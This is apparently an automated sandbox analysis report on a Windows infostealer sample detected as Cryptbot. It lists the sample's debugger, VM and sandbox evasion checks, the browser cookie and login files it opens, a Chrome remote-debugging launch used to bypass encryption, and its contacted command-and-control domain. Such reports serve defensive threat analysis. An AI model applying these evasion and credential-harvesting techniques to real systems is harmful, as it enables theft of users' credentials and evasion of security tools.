Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 710053F second address: 7100562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAC110B28Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7100562 second address: 71005DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FDAC0B0C806h 0x0000000f push eax 0x00000010 jmp 00007FDAC0B0C7FBh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDAC0B0C804h 0x0000001d sbb cx, 4B48h 0x00000022 jmp 00007FDAC0B0C7FBh 0x00000027 popfd 0x00000028 mov ecx, 2736A2BFh 0x0000002d popad 0x0000002e mov eax, 00000001h 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDAC0B0C801h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 71005DA second address: 71005F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: D2F9BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: D2FA88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: EE9848 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: F65F39 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 757 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 2236 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 2698 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1933 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8066 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6876 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6876 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6880 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6880 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6860 Thread sleep count: 757 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6860 Thread sleep time: -1514757s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 7148 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6856 Thread sleep count: 2236 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6856 Thread sleep time: -4474236s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6828 Thread sleep count: 2698 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6828 Thread sleep time: -5398698s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep count: 1933 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep time: -193300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep count: 8066 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep time: -806600s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2160676616.000001DA2F6A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AD4q0qFvM8.exe, 00000000.00000003.1770853111.0000000006911000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: NTICE
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: SICE
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D68230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00D68230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D6116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_00D6116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00D611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D61160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00D61160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_00D613C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 3696, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Leaks process information
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.121.15.192:80
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579773 Sample: AD4q0qFvM8.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 7 other signatures 2->56 7 AD4q0qFvM8.exe 5 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 service123.exe 2->16         started        process3 dnsIp4 40 httpbin.org 98.85.100.80, 443, 49730 TWC-11351-NORTHEASTUS United States 7->40 42 twentytk20ht.top 185.121.15.192, 49731, 49732, 49739 REDSERVICIOES Spain 7->42 44 2 other IPs or domains 7->44 36 C:\Users\user\AppData\...\service123.exe, PE32 7->36 dropped 38 C:\Users\user\...LLRGATenShKoyKeRtXA.dll, PE32 7->38 dropped 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->66 68 8 other signatures 7->68 18 service123.exe 7->18         started        21 WerFault.exe 21 16 7->21         started        24 chrome.exe 7->24         started        27 schtasks.exe 1 7->27         started        file5 signatures6 process7 dnsIp8 58 Found evasive API chain (may stop execution after checking mutex) 18->58 60 Found stalling execution ending in API Sleep call 18->60 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->34 dropped 46 239.255.255.250 unknown Reserved 24->46 29 chrome.exe 24->29         started        32 conhost.exe 27->32         started        file9 signatures10 process11 dnsIp12 48 www.google.com 142.250.181.132, 443, 49749 GOOGLEUS United States 29->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.121.15.192
 home.twentytk20ht.top Spain
207046 REDSERVICIOES false
98.85.100.80
 httpbin.org United States
11351 TWC-11351-NORTHEASTUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.181.132
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.google.com 142.250.181.132 true
home.twentytk20ht.top 185.121.15.192 true
twentytk20ht.top 185.121.15.192 true
httpbin.org 98.85.100.80 true